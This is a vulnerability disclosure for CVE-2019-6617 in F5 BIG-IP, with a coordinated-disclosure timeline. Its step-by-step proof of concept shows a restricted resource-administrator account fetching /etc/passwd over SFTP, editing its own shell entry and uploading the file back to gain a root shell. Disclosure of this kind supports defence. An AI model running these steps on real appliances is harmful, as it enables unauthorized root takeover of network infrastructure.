CVE-2019-6617.txt

Title: F5 BIG-IP Resource Administrator Privilege Escalation

Author: Rich Mirch

CVE: CVE-2019-6617

Vendor Advisory: https://support.f5.com/csp/article/K38941195

Description

An F5 BIG-IP account with the resource administrator role while also having
terminal access disabled still has the ability to access the appliance via
SFTP as root. This PoC will show that a resource administrator can obtain root
access to the appliance and take full control with terminal access disabled.

Technical details

A local account configured with the resource administrator role is created as
a Linux user with uid set to zero/root. SSH is not allowed when terminal
access is disabled. The problem is that the SFTP service is still allowed
without any restrictions. Since a resource administrator account is a Linux
root account, it has the ability to overwrite any file on the system.

Note: The SSH service must be enabled and the management interface accessible.


CVSS

Vector:   CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
Base:     7.2
Temporal: 6.9


Test Environment

F5 BIG-IP Virtual Edition 14.0.0.1

[root@bigip14:Active:Standalone] ~ # tmsh show sys version

Sys::Version
Main Package
  Product     BIG-IP
  Version     14.0.0.1
  Build       0.0.2
  Edition     Point Release 1
  Date        Fri Aug 17 16:22:25 PDT 2018


A resource administrator account(resadmin) with the following attributes was used for this PoC.
Note the shell attribute is set to “none".

[root@bigip14:Active:Standalone] ~ # tmsh list auth user resadmin | grep -v encrypted-password
auth user resadmin {
    description resadmin
    partition Common
    partition-access {
        all-partitions {
            role resource-admin
        }
    }
    shell none
}


Proof Of Concept

[Step 1]
Show that resadmin is not allowed to SSH.

$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:23:23 2018 from 1.2.3.4
This account is currently not available.
Connection to 5.6.7.8 closed.


[Step 2]
Connect to the appliance as resadmin via SFTP and retrieve the /etc/passwd file.

$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> get /etc/passwd
Fetching /etc/passwd to passwd
/etc/passwd                                        100% 1423   229.8KB/s   00:00
sftp> quit


[Step 3]
Update the local passwd file and change /sbin/nologin to /bin/bash for the resadmin user.

$ perl -p -i.orig -e 's!/sbin/nologin!/bin/bash! if /^resadmin/;' passwd


[Step 4]
Display a diff of the passwd change from step 3.

$ diff -u passwd.orig passwd
--- passwd.orig    2018-09-13 17:32:55.000000000 -0500
+++ passwd    2018-09-13 17:34:36.000000000 -0500
@@ -26,4 +26,4 @@
 hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
 syscheck:x:199:10::/:/sbin/nologin
 restnoded:x:198:198::/:/sbin/nologin
-resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin
+resadmin:x:0:500:resadmin:/home/resadmin:/bin/bash


[Step 5]
SFTP as resadmin and upload the modified passwd file to /etc/passwd.

$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> cd /etc
sftp> put passwd
Uploading passwd to /etc/passwd
passwd                               100% 1419   541.3KB/s   00:00
sftp> quit

[Step 6]
Login as resadmin via SSH and obtain a bash shell running as the root user.

$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:30:39 2018 from 1.2.3.4
[resadmin@bigip14:Active:Standalone] ~ # echo $SHELL
/bin/bash
[resadmin@bigip14:Active:Standalone] ~ # id
uid=0(root) gid=500(webusers) groups=500(webusers),495(sdm) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023


Timeline:

2018-09-13: Reported to vendor
2018-09-14: Vendor confirmed vulnerability
2018-09-26: Vendor requested embargo
2018-12-07: Contacted vendor for update
2019-04-30: Vendor released fix and advisory